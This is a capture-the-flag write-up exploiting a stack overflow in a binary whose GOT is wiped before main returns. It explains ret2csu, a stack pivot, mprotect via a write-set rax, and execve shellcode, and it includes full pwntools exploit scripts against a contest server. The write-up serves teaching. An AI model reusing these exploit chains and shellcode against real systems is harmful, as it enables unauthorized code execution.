External

Recon

As usual, we’ll start off by taking a look at the mitigations enabled in the binary:

$ checksec --file=./external  
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable     FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   81) Symbols       No    0               3               ./external

Cool, there’s no PIE and no canary, which will simplify things a bit if we find a buffer overflow. Additionally, after opening the file with Cutter we see that it’s linked against libc. This may come in handy as well, since the GOT is writeable (Partial RELRO). Now let’s take a look at the disassembly itself. This is the code for main:

: int main (int argc, char **argv, char **envp);
; var void *buf @ rbp-0x50
0x00401224      push    rbp
0x00401225      mov     rbp, rsp
0x00401228      sub     rsp, 0x50

		; puts("ROP me\n")
0x0040122c      lea     rdi, str.ROP_me ; 0x402012 ; const char *s
0x00401233      call    puts       ; sym.imp.puts ; int puts(const char *s)

		; printf("> ")
0x00401238      lea     rdi, [0x0040201c] ; const char *format
0x0040123f      mov     eax, 0
0x00401244      call    printf     ; sym.imp.printf ; int printf(const char *format)

		; read(0, buf, 0xf0)
0x00401249      lea     rax, [buf]
0x0040124d      mov     edx, 0xf0  ; 240 ; size_t nbyte
0x00401252      mov     rsi, rax   ; void *buf
0x00401255      mov     edi, 0     ; int fildes
0x0040125a      call    read       ; sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte)

		; clear_got()
0x0040125f      mov     eax, 0
0x00401264      call    clear_got  ; sym.clear_got

		; return 0
0x00401269      mov     eax, 0
0x0040126e      leave
0x0040126f      ret

; comments added for clarity

It seems simple enough: it prints a pretty suggestive message (namely, “ROP me\n> ”), reads from stdin into a buffer on the stack, and then calls clear_got. clear_got does exactly what one would expect: it memsets the whole GOT to 0 (more on this later). The buffer that stores our input begins at rbp-0x50, but read is asked for up to 0xf0 bytes, which results in a buffer overflow and gives us control over both rbp and rip once the function returns (remember that leave; ret moves rbp into rsp and then pops rbp and rip from the stack).
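
To make the arithmetic concrete, here is a small sketch of the stack layout implied by the disassembly. It only uses the two constants visible in the listing (the 0x50-byte buffer and the 0xf0-byte read); the variable names are mine and purely illustrative.

```python
# Stack layout of main, derived from the disassembly above.
BUF_SIZE = 0x50     # buf lives at rbp-0x50
SAVED_RBP = 0x8     # the saved rbp sits right above the buffer
READ_SIZE = 0xf0    # third argument passed to read

offset_to_ret = BUF_SIZE + SAVED_RBP       # bytes written before reaching the saved rip
chain_budget = READ_SIZE - offset_to_ret   # bytes left over for return addresses and data

print(hex(offset_to_ret))   # 0x58
print(hex(chain_budget))    # 0x98
print(chain_budget // 8)    # 19 qwords
```

So the saved rip starts 0x58 bytes into our input, and whatever we place there has to fit in 19 qwords.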

So far we can overflow the buffer to overwrite the rip stored on the stack, and make main return to whatever address we want. Recall that PIE is not enabled, which means that the binary will be loaded at the same virtual memory address every time the program is executed. And if the binary is always loaded at the same address, then every address within the binary will remain constant across different executions, and will be the same on remote as well. What all of this means is that we can just hard-code addresses into the payload, since they’re guaranteed to be the same on remote (this only applies to addresses within the binary, not to stack addresses and so on). This will be a huge benefit when we start working on our ROP chain.

While I’m at it, here’s a quick reminder on ROP (Return Oriented Programming). Basically, it works by changing the return address of a given function (in our case, main). We’ll make main return to an unintended address, where there’s some code that’s of interest to us. The program will continue to execute that code until it hits another ret, at which point it will return to whatever address is found on the top of the stack. If we get the math right when building the payload, we can make that second ret jump to another portion of code that’s of interest to us, and so on. We’re only limited by the number of bytes we’re able to write during the first read, and by the availability of ‘interesting’ portions of code that end with a ret instruction. We can write 0xf0 bytes, but the first 0x58 are just padding (0x50 bytes of buffer inside main’s stack frame plus 8 bytes of saved rbp), which leaves us with 0x98 bytes for our exploit.

At this point it looks like all of this will be pretty easy, right? There’s only one problem: the GOT has been zeroed out. Why is this important? Well, the GOT (Global Offset Table) holds the address of every libc function our binary imports. When we make a call to a libc function, the program will look up the address of that function in the GOT, and then jump to it. This is what a call to printf does, as an example:

: int printf (const char *format);
0x00401050      jmp     qword [reloc.printf] ; 0x404028
0x00401056      push    2          ; 2
0x0040105b      jmp     section..plt

As you can see, the first thing the PLT stub for printf does is jump to whatever address is stored at 0x404028, which is the entry for printf in the GOT. When the binary first loads, that entry holds the qword 0x401056, so jumping through reloc.printf does nothing but move on to the next instruction. The code that follows calls the dynamic linker, which fills the GOT entry with the correct address for printf. After that, reloc.printf points to the actual code for printf, which means any subsequent calls are resolved much faster.
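
The lazy-binding dance can be modelled in a few lines of Python. This is only a toy sketch: the PLT and GOT addresses come from the listing above, while REAL_PRINTF is a made-up libc address and the dictionary stands in for process memory.

```python
# Toy model of lazy binding for printf.
PLT_PRINTF_PUSH = 0x401056     # push 2 ; jmp section..plt (second half of the stub)
GOT_PRINTF = 0x404028          # reloc.printf
REAL_PRINTF = 0x7ffff7e4a000   # hypothetical libc address, for illustration only

got = {GOT_PRINTF: PLT_PRINTF_PUSH}   # state right after the binary is loaded
stats = {"resolver_calls": 0}

def call_printf():
    """Follow the PLT stub: jump through the GOT, resolving on first use."""
    target = got[GOT_PRINTF]
    if target == PLT_PRINTF_PUSH:
        # We fell through to push/jmp: the dynamic linker patches the GOT entry.
        stats["resolver_calls"] += 1
        got[GOT_PRINTF] = REAL_PRINTF
        target = REAL_PRINTF
    return target

first = call_printf()    # goes through the resolver
second = call_printf()   # jumps straight to printf
print(stats["resolver_calls"])   # 1

# clear_got zeroes the entry, so the same jmp would now land on address 0.
got[GOT_PRINTF] = 0
print(hex(got[GOT_PRINTF]))      # 0x0
```

The last two lines are the whole problem of this challenge: once the entry is zeroed, calling printf through the PLT crashes instead of resolving.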

Exploitation

Now let’s move on to the actual exploit.

As you can probably imagine, in order to bypass the fact that the GOT has been erased, we could jump directly to 0x401056 and have the GOT entry for printf re-populated. We could do that for every libc function, and then go from there. That’s entirely doable and it was, in fact, our first approach. We constructed a ROP chain that would call all of the libc functions in the GOT. This would re-populate the GOT, and give us the possibility of using libc functions again. Once this was done, we would call printf with the right arguments in order to leak addresses from libc and calculate the address of system. Finally, we would have everything we needed to call system("/bin/sh").

And it worked… locally. For some unknown reason this exploit worked like a charm on our local hosts, but not on remote. After some debugging we found that calling memset was causing trouble (maybe because we couldn’t control the third argument passed to it, so it would try to memset too many bytes?).

For a more in-depth explanation of how to leak libc addresses, and how that helps to identify which libc version is being used on remote, check out the write-up on The Pwn Inn from this same CTF, in which we dive into a lot more detail on how it works. Since this was not the way we ended up solving the challenge, we won’t delve into too much detail on it right now (though the code we tried can be found at the end of this write-up).

In the end, we decided to go down a different path: invoke mprotect somehow, and get the stack to be executable. At that point we can open up a shell with a little bit of shellcode, no libc involved. There are only two problems: 1) we don’t know where the stack is located, 2) we lack gadgets.

Quick note for those un-familiar with ROP. Remember how I talked about using ‘interesting’ bits of code ending in a ret instruction before? It turns out those pieces of code are called ‘gadgets’.

Let’s quickly address each of these issues:

Finding gadgets

As it turns out, we’re surprisingly low on gadgets. We need at the very least five things: a way to control rax, rdi, rsi and rdx, plus a syscall instruction. Why? Well, if we want to make an mprotect syscall we’ll want to control all three parameters passed to it (these are stored in rdi, rsi and rdx respectively), the syscall number is stored in rax, and the syscall is made with the syscall instruction. We’re asking for a lot of things here, but the only useful gadgets we’ve managed to find are:

$ ROPgadget --binary ./external
Gadgets information
============================================================
0x0000000000401269 : mov eax, 0 ; leave ; ret
; ...
0x000000000040127d : mov eax, 1 ; syscall
; ...
0x00000000004012f3 : pop rdi ; ret
0x00000000004012f1 : pop rsi ; pop r15 ; ret
; ...
0x000000000040101a : ret
; ...
0x0000000000401277 : syscall

Unique gadgets found: 106

And of course we can also use some parts of the actual disassembly as well.
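
As a reference for what we are trying to assemble, here is a minimal sketch of the x86-64 Linux syscall convention for the calls this write-up ends up using. The syscall numbers are the standard x86-64 ones; the helper name is mine, and the page address 0x404000 is the one the final exploit uses further down.

```python
# x86-64 Linux: syscall number in rax, first three arguments in rdi, rsi, rdx.
SYSCALL_NUMBERS = {"read": 0, "write": 1, "mprotect": 10, "execve": 59}

PROT_READ, PROT_WRITE, PROT_EXEC = 0x1, 0x2, 0x4

def syscall_registers(name, arg0, arg1, arg2):
    """Register state needed right before the syscall instruction (illustrative helper)."""
    return {"rax": SYSCALL_NUMBERS[name], "rdi": arg0, "rsi": arg1, "rdx": arg2}

# Target state for making one page readable, writable and executable.
regs = syscall_registers("mprotect", 0x404000, 0x1000,
                         PROT_READ | PROT_WRITE | PROT_EXEC)
for name, value in regs.items():
    print(name, hex(value))
```

Every register in that dictionary needs a gadget (or a trick) that sets it, which is why the short gadget list above is a problem.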

Well, we can control rdi, rsi, invoke syscall with rax equal to 1 or 0, and not a whole lot more. But if we look closely at the code we can find something useful:

: __libc_csu_init (int64_t arg1, int64_t arg2, int64_t arg3);
; arg int64_t arg1 @ rdi
; arg int64_t arg2 @ rsi
; arg int64_t arg3 @ rdx
; ...
0x004012d0      mov     rdx, r14
0x004012d3      mov     rsi, r13
0x004012d6      mov     edi, r12d
0x004012d9      call    qword [r15 + rbx*8]
0x004012dd      add     rbx, 1
0x004012e1      cmp     rbp, rbx
0x004012e4      jne     0x4012d0
0x004012e6      add     rsp, 8
0x004012ea      pop     rbx
0x004012eb      pop     rbp
0x004012ec      pop     r12
0x004012ee      pop     r13
0x004012f0      pop     r14
0x004012f2      pop     r15
0x004012f4      ret

Isn’t this a bit interesting? Say we jumped to address 0x4012ea, then rbx, rbp and r12 through r15 will be popped from the stack, then a ret will be executed. What if that ret jumped to address 0x4012d0? Then all those values previously popped from the stack would be inserted into rdx, rsi and edi. That’s just what we want!

Actually, using this approach we can only write an arbitrary value into edi (the lower 32 bits of rdi), but we don’t need to worry much about this: all of the addresses we’re interested in fit in one dword, and writing to edi zeroes out the upper 32 bits of rdi.

There’s a catch though: r15 + rbx * 8 needs to point to an address where another address is stored. That second address should point to some code that won’t modify rdx (ideally none of the previous registers, but rdx is the only one we really can’t afford to lose), and that will eventually lead to a ret. Also, since the instruction at 0x4012d9 is a call, it will push the return address onto the stack, so our ROP chain will not continue until the ret at 0x4012f4 is executed (and for that to work, rbp must be equal to rbx plus 1, because rbx is incremented before the comparison at 0x4012e1).

This isn’t as bad as it may seem at first glance, though. If we load 0x403e38 into r15 and 0x0 into rbx then that call at 0x4012d9 will take us to the following bit of code:

: _fini ();
0x00401308      endbr64            ; [14] -r-x section size 13 named .fini
0x0040130c      sub     rsp, 8
0x00401310      add     rsp, 8
0x00401314      ret

That’s because, for whatever reason, the qword stored at 0x403e38 is equal to 0x401308 (don’t ask me where I got that from, hours of staring at hexdump’s output were involved). Since rbp should be equal to rbx plus 1, and rbx needs to be 0x0, we have no choice but to load 0x1 into rbp.

This is getting a little convoluted, I hope I didn’t lose you so far. To summarize, the only takeaway here is: rdx is ours, but changing its value will cost us a lot of space in our ROP chain. This isn’t really a problem though, since we can just use this gigantic ROP chain to fire a second read syscall. One might (fairly) argue: Why make such an annoying ROP chain just to invoke read again? Well, now that we control the arguments passed on to read, we can make the second read call read an enormous amount of bytes, and store the result in a known address. As we’ll see, this will come in handy later on.
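
The pattern described in this section can be wrapped in a small helper. The sketch below is my own packaging of it, not code from the original exploit: the gadget addresses and the 0x403e38 pointer come from the text above, the helper name ret2csu is hypothetical, and struct.pack is used in place of pwntools’ p64 so that it runs without extra dependencies.

```python
import struct

POP_GADGET = 0x4012ea       # pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
MOV_CALL_GADGET = 0x4012d0  # mov rdx, r14; mov rsi, r13; mov edi, r12d; call [r15 + rbx*8]
FINI_PTR = 0x403e38         # address holding a pointer to _fini

def p64(value):
    """Pack a 64-bit little-endian value (stand-in for pwntools' p64)."""
    return struct.pack("<Q", value)

def ret2csu(edi, rsi, rdx):
    """Chain fragment that loads edi, rsi and rdx, then returns to whatever follows it."""
    assert edi <= 0xffffffff, "only the lower 32 bits of rdi can be set this way"
    rbx, rbp = 0, 1  # rbp == rbx + 1, so the jne falls through after a single call
    chain = p64(POP_GADGET)
    chain += p64(rbx) + p64(rbp) + p64(edi) + p64(rsi) + p64(rdx) + p64(FINI_PTR)
    chain += p64(MOV_CALL_GADGET)
    chain += b"A" * (7 * 8)  # consumed by 'add rsp, 8' and the six pops on the way out
    return chain

# Arguments for read(0, 0x404000, 0x1000); 0x404000 is the address the final exploit uses.
frag = ret2csu(0, 0x404000, 0x1000)
print(hex(len(frag)))   # 0x78
```

Each use costs 0x78 bytes before the address of the syscall gadget is even appended, which is why only one of these fits in the 0x98 bytes available after the first read.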

Where did those two functions _fini and __libc_csu_init come from? Well, it turns out these are pieces of code that the compiler automatically attaches to our executable every time we compile a program (at least gcc does it on GNU/Linux). Using these gadgets is known as ret2csu. You can read more about it and how it’s used in this paper.

Finding the stack

I’ll say this upfront: we don’t need to find the stack. After the read discussed in the previous section is executed, we can use the region of memory used for storing the results as a fake stack. It’ll work like this:

  • Use the ROP chain discussed previously to read as many bytes as we want into address X (we need to make sure this address is writeable first)
  • Make rsp point to address X
  • Continue executing our ROP from there

That’s it! Now we’ve got a larger buffer that we can use to invoke mprotect. Since our ‘stack’ is now at a known address, we can make that region executable and finally jump to our shellcode (which should be stored there as well).
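
One detail worth working out is where execution resumes after the pivot. The final exploit pivots with the gadget at 0x4012ed (pop rsp followed by three more pops and a ret), so the first three qwords of the fake stack are thrown away. The sketch below models that with a byte string standing in for the memory at X; the helper name is mine.

```python
import struct

FAKE_STACK = 0x404000   # address X used by the final exploit

def pivot_entry(new_rsp, pops_after_pivot=3):
    """Address from which the gadget's final ret fetches its return address."""
    return new_rsp + 8 * pops_after_pivot

# Contents of the fake stack: 0x18 bytes of padding, then the first gadget address.
memory = b"A" * 0x18 + struct.pack("<Q", 0x4012ea)

entry = pivot_entry(FAKE_STACK)
next_rip = struct.unpack_from("<Q", memory, entry - FAKE_STACK)[0]

print(hex(entry))      # 0x404018
print(hex(next_rip))   # 0x4012ea
```

That is the reason the second payload has to start with 0x18 bytes of padding.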

Invoking mprotect

Quick sidenote on invoking mprotect: we have no direct control over rax. To get around this, we can use our ROP chain to invoke a write syscall.

Recall that we now control rdi, rsi and rdx, and that there’s a gadget that does mov rax, 1; syscall; ret (1 is the syscall number for write), so invoking write with the right arguments should be no problem.

We can tell the kernel to write 0x0a bytes (0x0a being the syscall number for mprotect) from any readable address to standard output. As a result, the kernel will store the number of written bytes (0x0a) in rax. As you can see, it just takes a little bit of work, but that way we can control rax as well!
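
The trick relies on nothing more than write returning the number of bytes it wrote. Here is a quick way to convince yourself from Python, using a pipe instead of standard output so that nothing is printed by the write itself (the pipe is just a convenience for the demonstration):

```python
import os

MPROTECT_NR = 10   # 0x0a, the mprotect syscall number on x86-64 Linux

read_end, write_end = os.pipe()
written = os.write(write_end, b"B" * MPROTECT_NR)   # return value is the byte count
os.close(write_end)
data = os.read(read_end, 64)
os.close(read_end)

print(written)     # 10
print(len(data))   # 10
```

In the exploit that return value is left in rax, ready for the next syscall instruction.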

Putting it all together

All of this might feel a bit overwhelming because of all the details involved, but try to keep in mind the core idea:

  • We have a way of invoking a read syscall while controlling all of its arguments, so we read a large number of bytes into some address X.
  • We make rsp point to that address (with a gadget such as leave; ret, since we have control over rbp, or with the pop rsp gadget used in the exploit below).
  • Now the ‘stack’ will be located at a known address and we have total control over its contents. So we use this fake stack to call write(1, [whatever], 0x0a) using the same mechanism as in step 1, effectively filling rax with 0x0a.
  • Now that rax is 0x0a we again use the same mechanism as the one in step 1 to invoke a syscall that will make the whole memory page at X executable.
  • We jump to our shellcode, which will be stored at X + [someOffset]

The resulting exploit will look something like this (using Python and pwntools):

from pwn import *

context.update(os='linux', arch='amd64')

p = remote('161.97.176.150', 9999)

# First payload, this will just trigger read(0, 0x404000, 0x1000)
# Why 0x404000? Well, that's a read-write memory section, that means the whole page 
# is read-write, so we've got 0x1000 bytes to play around with at that address
payload0 = b''
payload0 += 0x58 * b'A'      # padding
payload0 += p64(0x4012ea)    # address of gadget 1 (pop rbx; pop ... ; ret)
payload0 += p64(0x0)         # rbx
payload0 += p64(0x1)         # rbp
payload0 += p64(0x0)         # r12
payload0 += p64(0x404000)    # r13
payload0 += p64(0x1000)      # r14
payload0 += p64(0x403e38)    # r15
payload0 += p64(0x4012d0)    # address of gadget 2 (mov rdx, r14; mov ...; call [r15 + rbx * 8])

# Since after the call instruction (address 0x4012dd) rbx, rbp, 
# r12-r15 will be popped again, we need to add some padding
payload0 += (7 * 0x8) * b'A' # padding
payload0 += p64(0x401283)    # address of syscall ; ret
payload0 += p64(0x4012ed)    # address of gadget 3 (pop rsp; pop ... x3 ; ret)
# Address of our new 'stack' (will be poped into rsp)
payload0 += p64(0x404000)

p.info('Sending ' + hex(len(payload0)) + ' bytes')

p.recvuntil(b'> ')
p.send(payload0)

# This payload will be read into our fake stack, we need to remember that because
# of gadget 3 from payload 0 (pop rsp; 3 x pop ; ret) we need to insert 0x18 bytes of
# padding at the beginning

payload1 = b''
payload1 += b'A' * 0x18      # padding

# Let's trigger write(1, 0x404000, 0xa) so we can set rax to 0xa
# Same concept as before, fill rdi, rsi, rdx with the desired values
payload1 += p64(0x4012ea)    # gadget 1
payload1 += p64(0x0)         # rbx
payload1 += p64(0x1)         # rbp
payload1 += p64(0x1)         # r12
payload1 += p64(0x404000)    # r13
payload1 += p64(0xa)         # r14
payload1 += p64(0x403e38)    # r15
payload1 += p64(0x4012d0)    # gadget 2
payload1 += (7 * 0x8) * b'A' # padding
payload1 += p64(0x40127c)    # mov rax, 1; syscall ; ret

# Now that rax is set to 0x0a, let's trigger mprotect(0x404000, 0x1000, 0x7)
# Again, same concept, fill rdi, rsi and rdx with the desired values
payload1 += p64(0x4012ea)    # gadget 1
payload1 += p64(0x0)         # rbx
payload1 += p64(0x1)         # rbp
payload1 += p64(0x404000)    # r12
payload1 += p64(0x1000)      # r13
payload1 += p64(0x7)         # r14
payload1 += p64(0x403e38)    # r15
payload1 += p64(0x4012d0)    # gadget 2
payload1 += (7 * 0x8) * b'A' # padding
payload1 += p64(0x401283)    # syscall ; ret

# Address of our shellcode, our payload begins at address 0x404000, so we should add
# the current length of the payload plus 0x8, to account for this value
payload1 += p64(0x404000 + len(payload1) + 8)

# Basic shellcode that triggers execve('/bin/sh', 0, 0), since the 'read' syscall
# is used to read the shellcode we don't need to worry about special characters,
# null characters, or anything of the like
shellcode = b'\xb8\x3b\x00\x00\x00\x48\x8d\x3d\x08\x00\x00\x00\x48\x31\xf6\x48\x31\xd2\x0f\x05\x2f\x62\x69\x6e\x2f\x73\x68\x00'
payload1 += shellcode

p.send(payload1)
p.info('Sending ' + hex(len(payload1)) + ' bytes')

# Receive those 0xa bytes we've written so that the output doesn't get polluted
p.recv(0xa) 

# Profit!
p.interactive()
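
If the raw shellcode bytes look opaque, the following sketch splits them into instructions and checks that the rip-relative lea really points at the "/bin/sh" string. The instruction boundaries are my own reading of the bytes, and the variable names are illustrative.

```python
# Same bytes as the shellcode in the exploit, split per instruction.
shellcode = bytes.fromhex(
    "b83b000000"      # mov eax, 0x3b        (execve)
    "488d3d08000000"  # lea rdi, [rip + 8]   (address of "/bin/sh")
    "4831f6"          # xor rsi, rsi         (argv = NULL)
    "4831d2"          # xor rdx, rdx         (envp = NULL)
    "0f05"            # syscall
) + b"/bin/sh\x00"

rip_after_lea = 5 + 7   # rip points past the lea when the displacement is applied
displacement = int.from_bytes(shellcode[8:12], "little")
string_offset = rip_after_lea + displacement

print(len(shellcode))              # 28
print(string_offset)               # 20
print(shellcode[string_offset:])   # b'/bin/sh\x00'
```

The displacement of 8 skips exactly the two xor instructions and the syscall, so rdi ends up pointing at the string stored right after the code.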

The exploit in action:

$ python exploit.py 
[+] Opening connection to 161.97.176.150 on port 9999: Done
[*] Sending 0xe8 bytes
[*] Sending 0x13c bytes
[*] Switching to interactive mode
$ ls
bin
dev
etc
external
flag.txt
lib
lib64
usr
$ cat flag.txt
flag{0h_nO_My_G0t!!!!1111!1!}
$  

Honorable mentions

For those of you who are curious, here’s the initial attempt that we made which I talked about earlier (populating the GOT and calling system):

from pwn import *
import sys

context(os='linux', arch='amd64')

binary = ELF('./external')

# This is the libc in use on remote. We found out the version
# by leaking addresses and looking at the offsets between them
libc = ELF('./libc-2.28.so')

off_printf_got = binary.got['printf']
off_system_libc = libc.symbols['system']
off_printf_libc = libc.symbols['printf']
off_binsh_libc = next(libc.search(b"/bin/sh"))  # search takes bytes on Python 3

exploit  = b"\x41" * 0x58       # buffer + rbp
exploit += p64(0x4012f3)        # pop rdi ; ret
exploit += p64(0x402012)        # rdi = &"Ropme"
exploit += p64(0x401056)        # printf call
exploit += p64(0x4012f3)        # pop rdi ; ret
exploit += p64(off_printf_got)  # rdi = printf@got
exploit += p64(0x401036)        # puts call
exploit += p64(0x4012f3)        # pop rdi ; ret
exploit += p64(0x404050)        # rdi -> data section
exploit += p64(0x401066)        # memset call
exploit += p64(0x401086)        # read call
exploit += p64(binary.symbols['main'])

p = remote('161.97.176.150', 9999)
p.recvline()
p.recvuntil(b' ')
p.sendline(exploit)
printf_libc_addr = p.recvline()
printf_libc_addr = u64(printf_libc_addr[9:-1] + b"\x00\x00")  # pad the 6 leaked bytes to 8

system = printf_libc_addr - off_printf_libc + off_system_libc
binsh = printf_libc_addr - off_printf_libc + off_binsh_libc

log.info("printf @ {}".format(hex(printf_libc_addr)))
log.info("offset printf @ {}".format(hex(off_printf_libc)))
log.info("offset system @ {}".format(hex(off_system_libc)))
log.info("offset /bin/sh @ {}".format(hex(off_binsh_libc)))
log.info("system @ {}".format(hex(system)))
log.info("/bin/sh @ {}".format(hex(binsh)))

exploit2  = b"\x41" * 0x58       # buffer + rbp
exploit2 += p64(0x4012f3)        # pop rdi ; ret
exploit2 += p64(binsh)           # rdi -> /bin/sh
exploit2 += p64(system)

p.recvline()
p.recvuntil(b' ')
p.sendline(exploit2)
p.interactive()

Post written by @OctavioGalland